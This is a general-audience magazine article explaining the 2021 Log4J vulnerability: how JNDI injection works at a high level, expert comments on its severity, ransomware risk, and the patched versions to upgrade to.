Log4J - What is the most severe vulnerability of 2021?

by Alessandro Ebersol (Agent Smith)

To close out 2021, a major vulnerability has been discovered that has left the whole world on alert: the Log4J flaw.

The open source platform used by Apple, Twitter, Steam, and Tencent ventures has a serious loophole that allows malicious actors to steal sensitive data, send files to a server, and more.

According to Google, more than 35,000 Java packages, which represents more than 8% of the Maven Central repository (the main Java repository), were affected by the problem. Discovered on December 16, the vulnerability was deemed one of the "most serious" ever seen by Jen Easterly, head of the US Department of Cybersecurity and Infrastructure Security Agency (CISA).

How do attackers take advantage of the Log4j flaw?

According to Tenable, a Cyber Exposure specialist company, the Log4J problem is considered critical because exploiting it is relatively simple. The breach allows an unauthenticated remote attacker to perform an attack on the popular Apache Log4J log library, which is used by several very popular services such as iCloud, Amazon, and Tesla, in addition to those already mentioned at the beginning of this article.

According to Tenable, the vulnerability is exploited when an attacker sends a manipulated request that uses a Java Name and Directory Interface (JNDI) injection) through a variety of services including: Lightweight Directory Access Protocol, Secure (LDAP), Remote Method Invocation (RMI), and Domain Name Service (DNS).

I have watched videos about the vulnerability myself, and it works similar to SQL injection, where it is possible to inject commands into forms.

If the vulnerable server uses Log4J to log requests, the exploit sends a malicious payload via JNDI using one of the services mentioned above, all from a server controlled by the attacker.

What is the danger of the Log4j flaw?

Amit Yoran, cybersecurity expert and CEO of Tenable, says that this is the most critical problem of the last decade. Going even further, he argues that this is the largest vulnerability in the history of modern computing.

"This type of vulnerability is a reminder that organizations must develop mature cybersecurity programs to understand cyber risk in a dynamic world. While details are still beginning to come out, we encourage organizations to update their security controls, assume they have been compromised, and activate existing incident response plans," he comments.

According to Yoran, organizations should make it a priority to work with security and information engineering teams to drive agile responses to potential incidents and identify the internal impact of the breach.

One of the biggest risks that companies run is precisely being victims of ransomware attacks. In this type of scam, the attacker manages to encrypt the victim's information. After that, the cybercriminal charges a fee (usually in cryptocurrencies) for the data to be ransomed.

Do users need to be worried about Log4j?

The Log4j flaw has already been fixed as of the release of patches (Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later). However, with the scope of the problem and the large number of companies affected, should the end user be concerned about the problem?

Security experts warn that applications installed on computers and other personal devices that use the software are rare. This does not mean, however, that people can rest assured, quite to the contrary.

Besides pointing out that our personal data is "in the hands" of the various services and companies that use the open source platform, there is danger for everyone. It is necessary to create healthier digital habits.

There are no applications in the PCLinuxOS repository that use Log4J. It is more targeted to server applications, so servers are more vulnerable, and, generally, companies use old versions of Debian servers, which are not updated, and can expose these companies' servers (and their customers' data) to the flaw.